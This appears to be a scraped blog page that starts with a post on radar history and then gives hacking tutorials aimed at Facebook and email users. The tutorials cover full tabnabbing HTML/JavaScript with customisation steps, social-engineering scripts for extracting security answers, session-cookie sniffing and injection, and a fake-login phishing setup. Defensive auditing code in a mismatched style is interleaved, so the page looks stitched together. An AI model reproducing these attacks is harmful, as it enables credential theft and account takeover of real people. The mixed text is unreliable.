In this blog you will find posts about education, telecommunication engineering, CCNA switching & routing, CCNP, basic computing and blogging, online earning methods, basic networking, live cricket, etc.
22 Apr 2013
HISTORY OF RADAR
OBJECTIVE: To study the history of the evolution of radar systems to get some idea about this marvel.
HISTORY OF RADAR:
Several inventors, scientists, and engineers contributed to the development of radar. As early as 1886, Heinrich Hertz showed that radio waves could be reflected from solid objects. In 1895 Alexander Popov, a physics instructor at the Imperial Russian Navy school in Kronstadt, developed an apparatus using a coherer tube for detecting distant lightning strikes. The next year, he added a spark-gap transmitter.
BEGINNING OF RADAR:
During 1897, while testing this in communicating between two ships in the Baltic Sea, he took note of an interference beat caused by the passage of a third vessel. In his report, Popov wrote that this phenomenon might be used for detecting objects, but he did nothing more with this observation.
The German Christian Hülsmeyer was the first to use radio waves to detect "the presence of distant metallic objects". In 1904 he demonstrated the feasibility of detecting a ship in dense fog, but not its distance. He received Reich patent Nr. 165546 for his detection device in April 1904, and later patent 169154 for a related amendment for also determining the distance to the ship. He also received a British patent on September 23, 1904 for the first full Radar application, which he called telemobiloscope.
RADAR TODAY:
Air surveillance is carried out today, in systems other than Aegis and Patriot, with mechanically rotating antennas. Two-dimensional (2-D) radars for both military and civil systems use parabolic reflectors at L-band and above, or with arrays of dipole or Yagi elements in the VHF and UHF bands (see Figure 1). Power tubes (magnetrons, crossed-field amplifiers, or klystrons) predominate in the transmitters, as they did in 1980. A few systems have made the transition to multiple solid-state sources that are combined in an RF network for application to the duplexer and antenna.
Three-dimensional (3-D) radars use a variety of antenna types, most based on planar arrays but also including the unique array-fed reflector of the solid-state ARSR-4 radar. 3-D operation, or scanned electronically in elevation by phase shifters or frequency-scan networks (and sometimes both). Slotted-waveguide arrays have been designed as ultra-low sidelobe antennas (ULSA) reducing vulnerability to ECM and, as in the E-3 AWACS radar, reducing the spectral spreading of ground clutter return. Power tubes predominate as RF power sources for these radars as well.
HOW RADAR WORKS:
The basic idea behind radar is very simple: a signal is transmitted, it bounces off an object and it is later received by some type of receiver. This is like the type of thing that happens when sound echoes off a wall.
Basic RADAR System:
A basic radar system is split up into a transmitter, switch, antenna, receiver, data recorder, processor and some sort of output display. Everything starts with the transmitter as it transmits a high power pulse to a switch which then directs the pulse to be transmitted out an antenna. Just after the antenna is finished transmitting the pulse, the switch switches control to the receiver which allows the antenna to receive echoed signals. Once the signals are received the switch then transfers control back to the transmitter to transmit another signal. The switch may toggle control between the transmitter and the receiver as much as 1000 times per second.
Any received signals from the receiver are then sent to a data recorder for storage on a disk or tape. Later the data must be processed to be interpreted into something.
What is Tabnabbing ?
Hey friends, it's Chris Defaulter Valentine, a Microsoft Certified Systems Engineer (MCSE), Internet marketer, IIT hacker. I have 10 years' experience circumventing information security measures and can report that I've successfully compromised all systems that I targeted for unauthorized access except one. I have two years' experience as a private investigator, and my responsibilities included finding people and their money, primarily using social engineering techniques. Today I am going to show how to hack emails, social networking websites and other websites involving login information. The technique that I am going to teach you today is advanced tabnabbing. I have already explained what basic tabnabbing is; today we will extend our knowledge base, and I will explain things with a practical example. So let's learn.
1. A hacker (say, me, Chris) customizes the current webpage by editing/adding some new parameters and variables (check the code below for details).
2. I send a copy of this web page to the victim whose account or whatever I want to hack.
3. When the user opens that link, a webpage similar to this one opens, containing the real page in an iframe with the help of JavaScript.
4. The user is able to browse the website like the original one, going forward and backward and navigating through pages.
5. If the victim leaves the new webpage open for a certain period of time, the tab or website changes to the phish page (or simply fake page), which looks exactly like the original one.
6. When the user enters his/her credentials (username/password), he is entering them in the fake page and is trapped in the net that I have laid down to hack him.
Here ends the attack scenario for advanced tabnabbing.
Before the coding part, let's first share tips to protect yourself from this kind of attack, because it is completely undetectable and you will never be able to know that your account has been hacked or compromised. So first learn how to protect ourselves from advanced tabnabbing.
Follow the measures below to protect yourself from tabnabbing:
1. Always use an anti-JavaScript plugin in your web browser that stops execution of malicious JavaScript. For example: NoScript for Firefox.
2. If you notice anything suspicious happening, first of all verify the URL in the address bar.
3. If you receive a link in an email or chat message, never click on it directly. Always prefer to type it manually in the address bar to open it; this may cost you some manual work or time, but it will protect you from hidden malicious URLs.
4. The best way is to use a good web security toolbar like AVG web toolbar or Norton web security toolbar to protect yourself from such attacks.
5. If you use ideveloper or Firebug, verify the headers yourself if you find something suspicious.
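A site-side measure that complements the user tips above: step 3 of the scenario depends on the real site agreeing to load inside another origin's iframe, and a site can refuse that with `X-Frame-Options` or the CSP `frame-ancestors` directive. The following added example (not part of the original post; the URLs and sample headers are constructed, and the matching is a simplified model of browser behaviour) checks whether a response's headers would stop that framing:

```javascript
// Added example, not code from the original post. Simplified model of how a
// browser decides whether a response may render inside a cross-origin iframe:
// one ancestor only, enforced CSP only, exact scheme matching.

const DEFAULT_PORT = { "http:": "80", "https:": "443" };

// Several CSP headers arrive comma-joined; each one is a separate policy.
function parseCspPolicies(headerValue) {
  return String(headerValue || "").split(",").map((policy) => {
    const directives = new Map();
    for (const part of policy.split(";")) {
      const tokens = part.trim().split(/\s+/).filter(Boolean);
      if (tokens.length === 0) continue;
      const name = tokens[0].toLowerCase();
      // Within one policy the first occurrence of a directive wins.
      if (!directives.has(name)) directives.set(name, tokens.slice(1));
    }
    return directives;
  }).filter((directives) => directives.size > 0);
}

// Does one frame-ancestors source expression match the embedding page?
function sourceMatches(source, embedder, self) {
  const s = source.toLowerCase();
  if (s === "'self'") return embedder.origin === self.origin;
  if (s === "*") return true;
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return embedder.protocol === s; // e.g. https:
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([a-z0-9.-]+)(?::(\d+))?$/.exec(s);
  if (!m) return false; // 'none' and anything unrecognised match nothing
  const [, scheme, wildcard, host, port] = m;
  const wantProtocol = scheme ? scheme + ":" : self.protocol;
  if (embedder.protocol !== wantProtocol) return false;
  const actualPort = embedder.port || DEFAULT_PORT[embedder.protocol] || "";
  if (actualPort !== (port || DEFAULT_PORT[wantProtocol] || "")) return false;
  return wildcard ? embedder.hostname.endsWith("." + host) : embedder.hostname === host;
}

// headers: response headers of the framed site; siteUrl: the framed page;
// embedderUrl: the page that contains the <iframe>.
function mayBeFramed(headers, siteUrl, embedderUrl) {
  const self = new URL(siteUrl);
  const embedder = new URL(embedderUrl);
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v);

  const policies = parseCspPolicies(h["content-security-policy"])
    .filter((p) => p.has("frame-ancestors"));
  if (policies.length > 0) {
    // When frame-ancestors is present, X-Frame-Options is ignored.
    // Every policy must list a source that matches the embedder.
    const allowed = policies.every((p) =>
      p.get("frame-ancestors").some((src) => sourceMatches(src, embedder, self)));
    return { allowed, decidedBy: "frame-ancestors" };
  }

  const xfo = new Set((h["x-frame-options"] || "").split(",")
    .map((v) => v.trim().toLowerCase()).filter(Boolean));
  const known = ["deny", "sameorigin", "allowall"].some((v) => xfo.has(v));
  // Conflicting values that include a known one are treated as a block.
  if (xfo.size > 1) return { allowed: !known, decidedBy: known ? "x-frame-options" : "none" };
  if (xfo.has("deny")) return { allowed: false, decidedBy: "x-frame-options" };
  if (xfo.has("sameorigin")) {
    return { allowed: embedder.origin === self.origin, decidedBy: "x-frame-options" };
  }
  // No header, obsolete ALLOW-FROM, or an unknown value: no protection.
  return { allowed: true, decidedBy: "none" };
}

// Constructed responses for a hypothetical login page (not real captures).
const SITE = "https://login.example.test/";
const EMBEDDER = "https://other-site.example.net/";
const SAMPLES = {
  "no anti-framing header": {},
  "XFO deny": { "X-Frame-Options": "DENY" },
  "obsolete ALLOW-FROM": { "X-Frame-Options": "ALLOW-FROM https://partner.example.test" },
  "CSP none": { "Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'" },
};

function auditSamples() {
  const out = {};
  for (const [name, headers] of Object.entries(SAMPLES)) {
    out[name] = mayBeFramed(headers, SITE, EMBEDDER).allowed;
  }
  return out;
}

console.log(auditSamples());
```

A result of `allowed: true` means the page can still be wrapped as in step 3. Anti-framing headers address only the iframe step, so the user-side checks above still matter for a tab that replaces its own content.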
That ends our security part. Here ends my ethical hacker duty to notify all users about the attack. Now let's start the real stuff.
Note: Aza Raskin was the first person to propose the technique of tabnabbing, and we still follow the same concept. I will just extend his concept to the next level.
First sample code for doing tabnabbing with the help of iframes:
<!--
Title: Advanced Tabnabbing using IFRAMES and Java script
Author: Chris Defaulter Valentine ( Anonymous )
-->
<html>
<head><title></title></head>
<style type="text/css">
html {overflow: auto;}
html, body, div, iframe {margin: 0px; padding: 0px; height: 100%; border: none;}
iframe {display: block; width: 100%; border: none; overflow-y: auto; overflow-x: hidden;}
</style>
<body>
<script type="text/javascript">
//----------Set Script Options--------------
var REAL_PAGE_URL = "http://www.google.com/"; //This is the "Real" page that is shown when the user first views this page
var REAL_PAGE_TITLE = "Google"; //This sets the title of the "Real Page"
var FAKE_PAGE_URL = "http://www.hackingloops.com"; //Set this to the url of the fake page
var FAKE_PAGE_TITLE = "HackingLoops| Next Generation Hackers Portal"; //This sets the title of the fake page
var REAL_FAVICON = "http://www.google.com/favicon.ico"; //This sets the favicon. It will not switch or clear the "Real" favicon in IE.
var FAKE_FAVICON = "http://www.hackingloops.com/favicon.ico"; //Set's the fake favicon.
var TIME_TO_SWITCH_IE = "4000"; //Time before switch in Internet Explorer (after tab changes to fake tab).
var TIME_TO_SWITCH_OTHERS = "10000"; //Wait this long before switching .
//---------------End Options-----------------
var TIMER = null;
var SWITCHED = "false";
//Find Browser Type
var BROWSER_TYPE = "";
if(/MSIE (\d\.\d+);/.test(navigator.userAgent)){
BROWSER_TYPE = "Internet Explorer";
}
//Set REAL_PAGE_TITLE
document.title=REAL_PAGE_TITLE;
//Set FAVICON
if(REAL_FAVICON){
var link = document.createElement('link');
link.type = 'image/x-icon';
link.rel = 'shortcut icon';
link.href = REAL_FAVICON;
document.getElementsByTagName('head')[0].appendChild(link);
}
//Create our iframe (tabnab)
var el_tabnab = document.createElement("iframe");
el_tabnab.id="tabnab";
el_tabnab.name="tabnab";
document.body.appendChild(el_tabnab);
el_tabnab.setAttribute('src', REAL_PAGE_URL);
//Focus on the iframe (just in case the user doesn't click on it)
el_tabnab.focus();
//Wait to nab the tab!
if(BROWSER_TYPE=="Internet Explorer"){ //To unblur the tab changes in Internet Web browser
el_tabnab.onblur = function(){
TIMER = setTimeout(TabNabIt, TIME_TO_SWITCH_IE);
}
el_tabnab.onfocus= function(){
if(TIMER) clearTimeout(TIMER);
}
} else {
setTimeout(TabNabIt, TIME_TO_SWITCH_OTHERS);
}
function TabNabIt(){
if(SWITCHED == "false"){
//Redirect the iframe to FAKE_PAGE_URL
el_tabnab.src=FAKE_PAGE_URL;
//Change title to FAKE_PAGE_TITLE and favicon to FAKE_PAGE_FAVICON
if(FAKE_PAGE_TITLE) document.title = FAKE_PAGE_TITLE;
//Change the favicon -- This doesn't seem to work in IE
if(BROWSER_TYPE != "Internet Explorer"){
var links = document.getElementsByTagName("head")[0].getElementsByTagName("link");
for (var i=0; i<links.length; i++) {
var looplink = links[i];
if (looplink.type=="image/x-icon" && looplink.rel=="shortcut icon") {
document.getElementsByTagName("head")[0].removeChild(looplink);
}
}
var link = document.createElement("link");
link.type = "image/x-icon";
link.rel = "shortcut icon";
link.href = FAKE_FAVICON;
document.getElementsByTagName("head")[0].appendChild(link);
}
}
}
</script>
</body>
</html>
Now what you need to replace in this code to make it working say for Facebook:
1. REAL_PAGE_URL : www.facebook.com
2. REAL_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
3. FAKE_PAGE_URL : Your Fake Page or Phish Page URL
4. FAKE_PAGE_TITLE : Welcome to Facebook - Log In, Sign Up or Learn More
5. REAL_FAVICON : www.facebook.com/favicon.ico
6. FAKE_FAVICON : Your Fake Page URL/favicon.ico ( Note: Its better to upload the facebook favicon, it will make it more undetectable)
7. BROWSER_TYPE : Find which web browser normally user uses and put that name here in quotes.
8. TIME_TO_SWITCH_IE : Put numeric value (time) after you want tab to switch.
9. TIME_TO_SWITCH_OTHERS : Time after which you want to switch back to original 'real' page or some other Page.
Now as i have explained earlier you can use this technique to hack anything like email accounts, Facebook or any other social networking website. What you need to do is that just edit the above mentioned 9 fields and save it as anyname.htm and upload it any free web hosting website along with favicon file and send the link to user in form of email or chat message ( hidden using href keyword in html or spoofed using some other technique).
That's all for today. I hope you all enjoyed some advanced stuff. If you have any doubts or queries ask me in form of comments.
A comment of appreciation will do the work..
Note: This tutorial is only for Educational
Purposes, I did not take any responsibility of any misuse, you will be solely
responsible for any misuse that you do. Hacking email accounts is criminal
activity and is punishable under cyber crime and you may get upto 40 years of
imprisonment, if got caught in doing so.
What is Social Engineering Attack ?
I myself have had a few people in
the past ask me questions on social engineering. I always say to anyone, you
need to imagine social engineering as a game. But before i talk about the 'Game',
I want to go into detail about Basic knowledge and self preparation.
Basic knowledge and self preparation:
It's important, like most things in life, to be fully equipped and prepared to take on a task. I myself would suggest you have clear outlines of what you're trying to achieve, be it to get someone's email password, exploiting them for money, to get into an online game group/clan etc. In this case, the email and password of a Facebook account.
First of all, you need to take into consideration what you will need; for this social engineering tutorial I'm going to outline this from the perspective of obtaining someone's email password. Before I continue, I would like to stress some important factors you might want to take into consideration:
1) People are more open to you if they perceive you as an idiot.
2) People are less suspicious of you when you make them laugh.
3) People are more trusting if you actually take an interest in them.
I'm going to break these three points down to give you a better understanding of why this is:
In the case of 1 - nearly everyone seems to be more careless when they perceive you as an idiot; the main reason for that is, you don't consider someone who appears to be an idiot as a threat. Another reason is that people tend to become more open and arrogant when they feel they are on a higher pedestal than you (never forget that!). Now there are things you need to remember however: although these things are true, if you overplay your idiot persona it will not be good for your fortune. Always remember real morons are annoying as hell; you DO NOT want to put off the person you're trying to social engineer (unless you're trying to fail, then knock yourself out).
In the case of 2 - when talking to someone it's easy to see why this rule is advised. Often it's a good ice breaker, also reinforcing the idea that "you're a nice guy"; it slowly allows the person to build a relationship of 'trust' with you.
In the case of 3 - also an obvious advisement: if you just pester someone for information without at least pretending to take an interest in what they are saying, not only will you come across as rude, it will make the person wonder why you're probing them for personal info.
With these three points made, i will now continue with my example of obtaining someone's Facebook Email and password. Before you go into detail, it's important to outline what you need to successfully social engineer the password out of someone. Now you could try to Social engineer them for their password, I advise you be a bit more intelligent and indirectly social engineer them for their password by obtaining their password recovery knowledge. Now it's important to what you need to successfully hack their account through recovery questions. You will need the following:
With this in mind it's imperative you plan how you will obtain these details. I will tell you how I do it. But first I need you to understand, this whole transaction will not be completed over the course of a day; it can take days to weeks depending on the person. I suggest you talk to them and read them first. If they're open, then you can do it within days; if they're not, then it would be better you spread this out over a week or two. I also want you to imagine what you will say, try to predict their answers and MOST OF ALL, think of a scapegoat for why you're probing them for these answers, just in case you're less than subtle and arouse suspicion. If they ever suspect you it will go from a flame to a fire; it's important to stamp out all of their doubt in you as soon as possible.
Now there are many ways you can obtain their password and address. Some people post their address on their profiles, in which case this is easy pickings; however, that is rare. So you need to devise a way of obtaining that info. Now you can pretend that you are from a bank or something like this and ask for their email address. Or you can pretend that you are some student doing some research. Be creative.
Now i need the answer to their security question, now you need to find out what the question is, i suggest pretend to recover password to see what it is or get the info for all of the recovery questions email asks. Im going to go with the first option and say for example their recovery question was : What is your dogs name?.
How I would go about obtaining this would be to pretend to have a pet of my own, i would start off the convo like so:
me: Ffs my dog wont stop barking, seriously where did i leave my ducktape lol!
victim: lol yeah i know sometimes my dog's the same, annoying -.-
me: Oh you have a dog? i didn't realize whats your dogs name, if you don't mind me asking.
It is important to add "if you don't mind me asking", because it gives the person a bit of power over you and also shows a little respect (once again reinforcing the notion you're a nice fellow).
POINT: I wouldn't dive straight into "whats your dogs name" start with the breed first and remember try to predict what they will inturn ask (mines blah blah whats yours?).
With that in mind, I'm sure by now you can see how easy it is, to social engineer someone's password through the indirect method of password recovery. Now obviously most recovery questions wont be about pets mostly they're "mothers maiden name" "place of birth" etc. But use the same logic and work around it, remember think every detail through and ask yourself this if someone gave you this story or asked you in a certain way would it seem legit to you?
and when you have the email address, click on Facebook, I forgot password and will be sent on your email.
The Game:
The game is basically perfecting "self preparation". Social engineering is a game. Think about it in this way: each time trust is given to you, you advance a level; with each level you advance, obtaining information from this person becomes easier. In a sense, mastering the ability to come up with more ingenious ways of manipulating someone, without arousing suspicion, is what separates the lucky noobs from the elites.
When thinking about this as a game, you need to reflect on your goals. As I've mentioned before try to imagine the dialogue between you both, think about how you will obtain certain things and more importantly have clear directives. With this in mind i think we can now talk about how you might want to consider presenting yourself (only applies if the person is indeed a stranger).
So if you were going to go after a complete stranger, you should first try and get as much research on them as you can, for example age and name. This is important for making up a fake identity. I would also suggest, if you social engineer more than one person, that you write down, in detail, your different aliases so you don't get confused. Nothing would be worse than using the wrong alias on the wrong person.
When building your identity decide on what would give you the biggest advantage with this person. This can be from faking your age to match the interests of this person, thus giving you the advantage of being able to "click" with the person. Pretending to be a student or in a dead end job for sympathy manipulation or in the case of a dead end job, pretending to relate to the slave. There are many things you can do, as I've mentioned it depends on the circumstances you need.
Social Engineering The Art of Human Hacking ?
Note:
This tutorial is only for Educational Purposes, I did not take any responsibility
of any misuse, you will be solely responsible for any misuse that you do.
Hacking email accounts is criminal activity and is punishable under cyber crime
and you may get upto 40 years of imprisonment, if got caught in doing so.
What is Session Hijacking Attack ?
Session hijacking, also known as TCP session hijacking, is a
method of taking over a Web user session by surreptitiously obtaining the
session ID and masquerading as the authorized user. Once the user's session ID
has been accessed (through session prediction), the attacker can masquerade as
that user and do anything the user is authorized to do on the network.
The session ID is normally stored within a cookie or URL. For most communications, authentication procedures are carried out at set up. Session hijacking takes advantage of that practice by intruding in real time, during a session. The intrusion may or may not be detectable, depending on the user's level of technical knowledge and the nature of the attack. If a Web site does not respond in the normal or expected way to user input or stops responding altogether for an unknown reason, session hijacking is a possible cause.
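Because the session ID normally lives in a cookie, the cookie's attributes and the site's transport policy decide whether that ID can be observed on the network or read by page scripts. As an added example (not from the original post; the cookie names, values, URL and finding labels are constructed), this audits a response's `Set-Cookie` and `Strict-Transport-Security` headers for the settings that keep a session ID off unencrypted connections:

```javascript
// Added example, not code from the original post. Cookie names, values,
// the URL and the finding labels below are constructed for illustration.

// Split one Set-Cookie header value into name, value and attributes.
function parseSetCookie(line) {
  const [pair, ...rest] = line.split(";");
  const eq = pair.indexOf("=");
  if (eq < 1) return null; // no name=value pair
  const attrs = new Map();
  for (const item of rest) {
    const i = item.indexOf("=");
    const key = (i < 0 ? item : item.slice(0, i)).trim().toLowerCase();
    if (key) attrs.set(key, i < 0 ? "" : item.slice(i + 1).trim());
  }
  return { name: pair.slice(0, eq).trim(), value: pair.slice(eq + 1).trim(), attrs };
}

// Return a list of weaknesses for a cookie that carries a session ID.
function auditSessionCookie(line) {
  const c = parseSetCookie(line);
  if (!c) return ["unparseable"];
  const findings = [];
  const secure = c.attrs.has("secure");
  // Without Secure the browser also sends the cookie over http://,
  // where anyone capturing the traffic can read it.
  if (!secure) findings.push("no-secure");
  // Without HttpOnly any script running in the page can read the cookie.
  if (!c.attrs.has("httponly")) findings.push("no-httponly");
  const sameSite = (c.attrs.get("samesite") || "").toLowerCase();
  if (sameSite === "none") findings.push("samesite-none");
  else if (!["strict", "lax"].includes(sameSite)) findings.push("no-samesite");
  // A Domain attribute widens the cookie to every subdomain.
  if (c.attrs.has("domain")) findings.push("domain-wide");
  // Name prefixes are promises the browser enforces; flag broken ones.
  if (c.name.startsWith("__Host-") &&
      (!secure || c.attrs.get("path") !== "/" || c.attrs.has("domain"))) {
    findings.push("bad-host-prefix");
  }
  if (c.name.startsWith("__Secure-") && !secure) findings.push("bad-secure-prefix");
  return findings;
}

// Audit one response: transport policy plus every named session cookie.
// headers uses lower-case names; "set-cookie" is an array of header values.
function auditResponse(url, headers, sessionNames) {
  const site = [];
  if (new URL(url).protocol !== "https:") {
    site.push("plaintext-response"); // the whole exchange is readable in transit
  } else {
    const hsts = /max-age\s*=\s*"?(\d+)/i.exec(headers["strict-transport-security"] || "");
    // Without HSTS a first request may still go out over http://.
    if (!hsts || Number(hsts[1]) === 0) site.push("no-hsts");
  }
  const cookies = {};
  for (const line of headers["set-cookie"] || []) {
    const parsed = parseSetCookie(line);
    if (parsed && sessionNames.includes(parsed.name)) {
      cookies[parsed.name] = auditSessionCookie(line);
    }
  }
  return { site, cookies };
}

// Constructed sample response (not a real capture).
const SAMPLE = {
  url: "https://app.example.test/login",
  headers: {
    "strict-transport-security": "max-age=31536000; includeSubDomains",
    "set-cookie": [
      "sid=c2FtcGxlLXZhbHVl; Path=/; Domain=.example.test",
      "__Host-sid=c2FtcGxlLXZhbHVl; Path=/; Secure; HttpOnly; SameSite=Lax",
      "theme=dark; Path=/",
    ],
  },
};

console.log(JSON.stringify(auditResponse(SAMPLE.url, SAMPLE.headers, ["sid", "__Host-sid"]), null, 2));
```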
Step By Step Explanation Of How To Carry Out This Attack ?
First of all, you would need to connect to an unsecured wireless connection that others are using. Then we start capturing packets transferred over this network. Note that your wireless adapter needs to support monitor mode to scan all packets transferred over a network. You can check your Wi-Fi card specifications to see if it supports monitor mode.
We would then need to use a network sniffing tool to sniff packets transferred over the network. In this case, I am using a tool called Wireshark. Within Wireshark, there is a menu called "Capture"; under the Capture menu, select Interfaces, and a list of your interfaces will come up.
Next you select Start next to the interface that you have enabled monitor mode on. Most times it is the interface that is capturing the most packets. In my case, the Microsoft interface is capturing the most packets, so I will select to start capturing with the Microsoft interface. You would leave Wireshark to capture packets for a couple of seconds, depending on the number of persons currently using the network: say 30 seconds if 10 people are currently using the network, or 30 minutes if there is barely any network activity going on. While capturing, Wireshark will look something like this.
After capturing a certain amount of packets, or running the
capture for a certain amount of time, stop it by clicking on the stop current
capture button.
After stopping the capture, you will need to look for the user's
facebook session cookie which, hopefully was transferred in one of the packets
captured. to find this cookie, use the wireshark search which can be found by
pressing "ctrl + f" on your keyboard. In this search interface,
select Find: By "String"; Search In: "Packet Details". and
Filter by the string "Cookie".
When you press Find, if there is a cookie, this search will find it; if no cookie was captured, you will have to start back at step 2. However, if you're lucky and some cookies were captured, when you search for cookie, your interface will come up looking like the diagram below. You will notice the cookie next to the arrow contains lots of data. To get the data, the next thing you do is right-click on the cookie and click Copy -> Description.
After copying the description, paste it in a text file, and
separate each variable to a new line (note the end of every variable is
depicted by a semicolon eg - c_user=100002316516702;). After some research
and experimenting, i figured out that facebook authenticated the user session
by 2 cookies called c_user and xs. Therefore you will only need the values of
these cookies, and then need to inject them into your browser. Before injecting
the cookies, here is what my facebook page looked like:
The next thing you would need to do is to inject this
information as your own cookie. so firstly you would need to install a cookie
manager extension for your browser, I'm using firefox Cookie Manager. After
installing this extension, you will find it under Tools->cookie manager. The
interface for cookie manager looks like this:
The first thing we would need to do is to clear all cookies,
so clear all the cookies you currently have. Then select the "Add
Cookie" link to add a new cookie. The first cookie you will add is the
c_user cookie, which will have the following information: Domain -
".facebook.com", Name - "c_user", Value - "the value you
copied earlier from the Wireshark scanning" and Path - "/";
leave the isSecure and Expires On values at their defaults:
The next thing you do is hit the "Add" button and the cookie
is saved. Repeat the same steps to add the xs cookie with all of the same
information, except the value, which would be the xs value you have.
After adding these 2 cookies, just go to facebook.com, refresh the page and...
Boom!! You will see you are logged in as the user whose cookie information you
stole. Here is my Facebook page after I injected those cookies:
Note:
This tutorial is only for educational purposes. I do not take any
responsibility for any misuse; you will be solely responsible for any misuse
that you do. Hacking email accounts is criminal activity and is punishable
under cyber crime and you may get up to 40 years of imprisonment if caught
doing so.
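The capture described above only yields c_user and xs when they cross the network in cleartext HTTP. The following check is an added example, not code from the original post: it audits the response headers of a site you operate and flags session cookies that a browser would still send over plain HTTP. The sample headers and cookie values are constructed.

```python
# c_user and xs are the two cookies the post names; adjust for your own application.
SESSION_COOKIES = {"c_user", "xs"}


def parse_set_cookie(value):
    """Return (name, cookie_value, attrs) with attribute names lower-cased, or None."""
    parts = [p.strip() for p in value.split(";") if p.strip()]
    if not parts or "=" not in parts[0]:
        return None
    name, _, cookie_value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), cookie_value, attrs


def audit_response(headers, session_names=SESSION_COOKIES):
    """headers: list of (name, value) pairs taken from one HTTPS response.

    Returns a sorted list of finding strings; an empty list means no findings.
    """
    findings = set()
    saw_hsts = False
    for header, value in headers:
        header = header.lower()
        if header == "strict-transport-security":
            saw_hsts = True
        if header != "set-cookie":
            continue
        parsed = parse_set_cookie(value)
        if parsed is None or parsed[0] not in session_names:
            continue
        name, _, attrs = parsed
        if "secure" not in attrs:
            findings.add(f"{name}: no Secure flag, browser will send it over http://")
        if "httponly" not in attrs:
            findings.add(f"{name}: no HttpOnly flag, readable from page scripts")
        if attrs.get("samesite", "").lower() not in ("lax", "strict", "none"):
            findings.add(f"{name}: no SameSite attribute")
    if not saw_hsts:
        findings.add("response: no Strict-Transport-Security header")
    return sorted(findings)


# Constructed sample responses (all values are made up).
WEAK = [
    ("Set-Cookie", "c_user=1000000000; Domain=.example.test; Path=/"),
    ("Set-Cookie", "xs=abc%3Adef; Domain=.example.test; Path=/; HttpOnly"),
    ("Set-Cookie", "locale=en_US; Path=/"),
]
HARDENED = [
    ("Strict-Transport-Security", "max-age=31536000; includeSubDomains"),
    ("Set-Cookie", "c_user=1000000000; Path=/; Secure; HttpOnly; SameSite=Lax"),
    ("Set-Cookie", "xs=abc%3Adef; Path=/; Secure; HttpOnly; SameSite=Lax"),
]

if __name__ == "__main__":
    for label, sample in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit_response(sample) or "no findings")
```

With Secure set on the session cookies and HSTS on the response, the browser never places those cookies in a cleartext request, so a passive capture has nothing to find.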
Phishing Attack
Phishing - is an e-mail fraud method in which the perpetrator sends out legitimate-looking email in an attempt to gather personal and financial information from recipients. Typically, the messages appear to come from well known and trustworthy Web sites. Web sites that are frequently spoofed by phishers include PayPal, eBay, MSN, Yahoo, BestBuy, and America Online. A phishing expedition, like the fishing expedition it's named for, is a speculative venture: the phisher puts the lure hoping to fool at least a few of the prey that encounter the bait.
1. First of all, you need a fake login page for Facebook (fake.html) and a PHP script to redirect and capture the victim's passwords (login.php)
2. Download Here - Click Me
Password - @hackaholic
3. After you download the files, open login.php with Notepad, search for the term
www.enteryoursite.com and replace it with the site address where you want the
victim to be redirected, then save it.
Note: This is a very important step. Redirect the victim to a proper site,
otherwise the victim will get suspicious. In our case we are making a fake
Facebook login page, so it's better to redirect the victim to www.facebook.com/careers
4. Now create an account at a free web hosting site like 110mb.com, T35.com or ripway.com
5. Now upload both the files (fake.html, login.php) to your hosting account and send the fake.html (fake Facebook login page) link to your victim
Example:-
www.yoursite.110mb.com/fake.html
6. Now when the victim enters all his credentials, like login name and password, in our fake login page and clicks login, he will be redirected to the site which we set in step 3
7. Now to see the victim's ID and password, log in to your hosting account "110mb.com", where you will see a new file "log.txt". Open it to see the victim's user ID and password
Note:- If you're still confused, you can watch my video on Hack a
Facebook Account Using a Fake login Page
This is a simple but very effective method to hack Facebook accounts. If you have any doubts please feel free to comment!!
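A defender-side check for the pattern this post describes: a page that shows a brand's login form but is served from, and posts the password to, a host the brand does not own. This is an added example, not code from the original post; the domain allowlist, the title keyword, the host yoursite.example and the sample HTML are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Assumptions: the brand's registered domain and the word a clone shows in <title>.
LEGIT_DOMAINS = ("facebook.com",)
BRAND_WORDS = ("facebook",)

class LoginFormScanner(HTMLParser):
    """Records the page title and every <form> that contains a password input."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.forms = []  # one dict per <form>: its action and has_password
        self._in_title = False
        self._form = None

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "form":
            self._form = {"action": attrs.get("action") or "", "has_password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if (attrs.get("type") or "").lower() == "password":
                self._form["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        elif tag == "form":
            self._form = None

    def handle_data(self, data):
        if self._in_title:
            self.title += data

def host_is_legit(host):
    """True only for the brand domain itself or a real subdomain of it."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in LEGIT_DOMAINS)

def assess_page(page_url, html):
    """Return reasons the page looks like a credential-harvesting clone ([] if none)."""
    scanner = LoginFormScanner()
    scanner.feed(html)
    if not any(word in scanner.title.lower() for word in BRAND_WORDS):
        return []  # the page does not claim to be the brand
    reasons = []
    page_host = urlparse(page_url).hostname
    for form in (f for f in scanner.forms if f["has_password"]):
        post_host = urlparse(urljoin(page_url, form["action"])).hostname
        if not host_is_legit(page_host):
            reasons.append(f"brand login form served from {page_host}")
        if not host_is_legit(post_host):
            reasons.append(f"password is posted to {post_host}")
    return reasons

# Constructed sample: a cloned login page, as it would sit on a free-hosting subdomain.
CLONE_HTML = """<html><head><title>Log in to Facebook</title></head><body>
<form action="login.php" method="post"><input type="text" name="email">
<input type="password" name="pass"><input type="submit"></form></body></html>"""
```

The suffix match in host_is_legit is deliberate: a lookalike such as facebook.com.yoursite.example contains the brand domain but does not end in it, so it is still reported.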
How to Password Protect Your USB Drive ?
There aren't too many things that
upset me. One item that does is people who put personal data on their thumb
drives without password protection. They are just waiting for a disaster as
sooner or later that USB flash drive will vanish. The question is who will get
the data next? If you don't want to spend money for a secure flash drive, then
we've got a free encryption utility you should use called Cryptainer LE.
As a bonus, it even works on your desktop or notebook.
Too often we focus on the
convenience of USB drives and not the importance of the data. We treat them
like the old floppy disks. No passwords and no encryption. Unlike the old
